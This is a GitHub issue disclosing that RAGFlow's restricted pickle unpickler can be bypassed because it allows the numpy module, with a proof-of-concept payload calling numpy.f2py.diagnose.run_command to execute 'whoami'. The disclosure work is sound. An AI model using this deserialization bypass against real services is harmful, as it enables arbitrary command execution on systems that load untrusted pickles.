Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Bug]: The restricted_loads function is still vulnerable through pickle deserialization with numpy module #1240

Closed
1 task done
William957-web opened this issue Jun 23, 2024 · 0 comments
Closed
1 task done

[Bug]: The restricted_loads function is still vulnerable through pickle deserialization with numpy module #1240

William957-web opened this issue Jun 23, 2024 · 0 comments
Labels
bug Something isn't working

Comments

@William957-web
Copy link
Contributor

William957-web commented Jun 23, 2024
edited
Loading

Is there an existing issue for the same bug?

  • I have checked the existing issues.

Branch name

main

Commit ID

fd7fcb5

Other environment information

No response

Actual behavior

The restricted_loads function at api/utils/init.py#L215 is still vulnerable leading via code execution.
The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.

Expected behavior

No response

Steps to reproduce

ragflow_patch.py

import builtins
import io
import pickle

safe_module = {
    'numpy',
    'rag_flow'
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()

Then, PoC.py

import pickle
from ragflow_patch import restricted_loads
class Exploit:
     def __reduce__(self):
         import numpy.f2py.diagnose
         return numpy.f2py.diagnose.run_command, ('whoami', )

Payload=pickle.dumps(Exploit())
restricted_loads(Payload)

Result
image

Additional information

How to prevent?

Strictly filter the module and name before calling with getattr
@William957-web William957-web added the bug Something isn't working label Jun 23, 2024
@William957-web William957-web mentioned this issue Jun 23, 2024
Merged
6 tasks
KevinHuSh referenced this issue Jun 24, 2024
@William957-web
Create SECURITY.md (#1241)
d185a2e 
### What problem does this PR solve?

The restricted_loads function at
[api/utils/init.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215)
is still vulnerable leading via code execution. The main reson is that
numpy module has a numpy.f2py.diagnose.run_command function directly
execute commands, but the restricted_loads function allows users import
functions in module numpy.

### Additional Details

[https://github.com/infiniflow/ragflow/issues/1240](https://github.com/infiniflow/ragflow/issues/1240)

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@KevinHuSh @William957-web